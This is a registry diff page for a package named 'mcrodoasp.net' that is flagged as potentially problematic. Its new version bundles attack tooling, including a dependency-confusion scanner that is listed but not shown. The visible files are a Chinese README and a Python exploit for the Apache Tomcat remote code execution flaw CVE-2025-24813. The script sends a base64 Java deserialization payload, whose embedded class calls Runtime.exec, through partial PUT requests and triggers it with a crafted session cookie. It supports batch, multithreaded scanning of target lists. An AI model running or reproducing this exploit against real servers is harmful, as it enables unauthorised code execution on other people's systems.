mcrodoasp.net 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of mcrodoasp.net might be problematic. Click here for more details.
- package/CVE-2025-24813-PoC/README.md +27 -0
- package/CVE-2025-24813-PoC/Tomcat_CVE-2025-24813_RCE.py +117 -0
- package/azure.com +11696 -0
- package/confused/.github/workflows/codeql-analysis.yml +67 -0
- package/confused/.github/workflows/golangci-lint.yml +22 -0
- package/confused/.goreleaser.yml +40 -0
- package/confused/CHANGELOG.md +31 -0
- package/confused/LICENSE +21 -0
- package/confused/README.md +103 -0
- package/confused/composer.go +105 -0
- package/confused/confused +0 -0
- package/confused/go.mod +3 -0
- package/confused/interfaces.go +11 -0
- package/confused/main.go +109 -0
- package/confused/mvn.go +120 -0
- package/confused/mvnparser.go +139 -0
- package/confused/npm.go +210 -0
- package/confused/pip.go +99 -0
- package/confused/rubygems.go +149 -0
- package/confused/util.go +16 -0
- package/index.js +46 -0
- package/package.json +8 -3
- package/setup.py +24 -0
- package/README.md +0 -5
|
@@ -0,0 +1,27 @@
|
|
|
1
|
+
# CVE-2025-24813-PoC
|
|
2
|
+
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
|
|
3
|
+
|
|
4
|
+
免责申明:
|
|
5
|
+
|
|
6
|
+
本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。
|
|
7
|
+
|
|
8
|
+
如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。
|
|
9
|
+
|
|
10
|
+
更多PoC 详见纷传:
|
|
11
|
+
|
|
12
|
+
https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X
|
|
13
|
+
|
|
14
|
+
|
|
15
|
+
利用条件较为苛刻,该脚本仅针对存在漏洞的环境进行概念性验证
|
|
16
|
+
|
|
17
|
+
使用方式:
|
|
18
|
+
|
|
19
|
+
批量检测支持多线程:
|
|
20
|
+
|
|
21
|
+
python poc.py -l url.txt -t 5
|
|
22
|
+
|
|
23
|
+
单个检测:
|
|
24
|
+
|
|
25
|
+
python poc.py -u your-ip
|
|
26
|
+
|
|
27
|
+
|
|
@@ -0,0 +1,117 @@
|
|
|
1
|
+
import argparse
|
|
2
|
+
import base64
|
|
3
|
+
import sys
|
|
4
|
+
import requests
|
|
5
|
+
from concurrent.futures import ThreadPoolExecutor
|
|
6
|
+
|
|
7
|
+
COLOR = {
|
|
8
|
+
"RED": "\033[91m",
|
|
9
|
+
"GREEN": "\033[92m",
|
|
10
|
+
"YELLOW": "\033[93m",
|
|
11
|
+
"BLUE": "\033[94m",
|
|
12
|
+
"PURPLE": "\033[95m",
|
|
13
|
+
"CYAN": "\033[96m",
|
|
14
|
+
"RESET": "\033[0m"
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
BANNER = rf"""
|
|
18
|
+
{COLOR['PURPLE']}
|
|
19
|
+
___ _ __ ___ | |_ ___ ___| |_
|
|
20
|
+
/ _ \| '_ \ / _ \| __/ _ \/ __| __|
|
|
21
|
+
| (_) | |_) | (_) | || __/\__ \ |_
|
|
22
|
+
\___/| .__/ \___/ \__\___||___/\__|
|
|
23
|
+
|_| {COLOR['CYAN']}Apache Tomcat RCE Detector
|
|
24
|
+
{COLOR['RED']}CVE-2025-24813 {COLOR['RESET']}@Author: iSee857
|
|
25
|
+
"""
|
|
26
|
+
|
|
27
|
+
# Payload
|
|
28
|
+
PAYLOAD = base64.b64decode(
|
|
29
|
+
"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"
|
|
30
|
+
)
|
|
31
|
+
|
|
32
|
+
def print_vulnerable(target):
|
|
33
|
+
print(f"\n{COLOR['RED']}[!] 目标存在漏洞: {target}")
|
|
34
|
+
print(f"[+] CVE-2025-24813 Apache Tomcat 远程代码执行漏洞{COLOR['RESET']}\n")
|
|
35
|
+
|
|
36
|
+
def check_target(target):
|
|
37
|
+
try:
|
|
38
|
+
host, port = target.split(":")
|
|
39
|
+
port = int(port)
|
|
40
|
+
except:
|
|
41
|
+
print(f"{COLOR['YELLOW']}[!] 无效目标格式: {target}{COLOR['RESET']}")
|
|
42
|
+
return
|
|
43
|
+
|
|
44
|
+
base_url = f"http://{host}:{port}"
|
|
45
|
+
put_url = f"{base_url}/iSee857/session"
|
|
46
|
+
|
|
47
|
+
try:
|
|
48
|
+
|
|
49
|
+
put_response = requests.put(
|
|
50
|
+
put_url,
|
|
51
|
+
headers={
|
|
52
|
+
"Host": f"{host}:{port}",
|
|
53
|
+
"Content-Length": "10000",
|
|
54
|
+
"Content-Range": "bytes 0-1000/1200"
|
|
55
|
+
},
|
|
56
|
+
data=PAYLOAD,
|
|
57
|
+
verify=False,
|
|
58
|
+
timeout=10
|
|
59
|
+
)
|
|
60
|
+
|
|
61
|
+
|
|
62
|
+
if put_response.status_code == 409:
|
|
63
|
+
get_response = requests.get(
|
|
64
|
+
base_url,
|
|
65
|
+
headers={"Cookie": "JSESSIONID=.iSee857"},
|
|
66
|
+
verify=False,
|
|
67
|
+
timeout=10
|
|
68
|
+
)
|
|
69
|
+
|
|
70
|
+
if get_response.status_code == 500:
|
|
71
|
+
print_vulnerable(target)
|
|
72
|
+
return True
|
|
73
|
+
|
|
74
|
+
print(f"{COLOR['GREEN']}[+] {target} 未检测到漏洞{COLOR['RESET']}")
|
|
75
|
+
return False
|
|
76
|
+
|
|
77
|
+
except requests.exceptions.RequestException as e:
|
|
78
|
+
print(f"{COLOR['YELLOW']}[!] {target} 检测失败: {str(e)}{COLOR['RESET']}")
|
|
79
|
+
return False
|
|
80
|
+
except Exception as e:
|
|
81
|
+
print(f"{COLOR['RED']}[!] {target} 发生错误: {str(e)}{COLOR['RESET']}")
|
|
82
|
+
return False
|
|
83
|
+
|
|
84
|
+
def main():
|
|
85
|
+
print(BANNER)
|
|
86
|
+
|
|
87
|
+
parser = argparse.ArgumentParser(description='Apache Tomcat RCE检测工具')
|
|
88
|
+
parser.add_argument('-u', '--url', help='单个目标 (格式: ip:port)')
|
|
89
|
+
parser.add_argument('-l', '--list', help='包含多个目标的文件')
|
|
90
|
+
parser.add_argument('-t', '--threads', type=int, default=5,
|
|
91
|
+
help='并发线程数 (默认: 5)')
|
|
92
|
+
args = parser.parse_args()
|
|
93
|
+
|
|
94
|
+
targets = []
|
|
95
|
+
if args.url:
|
|
96
|
+
targets.append(args.url)
|
|
97
|
+
elif args.list:
|
|
98
|
+
try:
|
|
99
|
+
with open(args.list, 'r') as f:
|
|
100
|
+
targets = [line.strip() for line in f if line.strip()]
|
|
101
|
+
except FileNotFoundError:
|
|
102
|
+
print(f"{COLOR['RED']}[!] 文件不存在: {args.list}{COLOR['RESET']}")
|
|
103
|
+
sys.exit(1)
|
|
104
|
+
else:
|
|
105
|
+
parser.print_help()
|
|
106
|
+
sys.exit(1)
|
|
107
|
+
|
|
108
|
+
print(f"{COLOR['CYAN']}[*] 开始检测,共 {len(targets)} 个目标...{COLOR['RESET']}")
|
|
109
|
+
|
|
110
|
+
with ThreadPoolExecutor(max_workers=args.threads) as executor:
|
|
111
|
+
results = executor.map(check_target, targets)
|
|
112
|
+
|
|
113
|
+
vulnerable_count = sum(1 for result in results if result)
|
|
114
|
+
print(f"\n{COLOR['PURPLE']}[*] bug {vulnerable_count} 个存在漏洞的目标{COLOR['RESET']}")
|
|
115
|
+
|
|
116
|
+
if __name__ == "__main__":
|
|
117
|
+
main()
|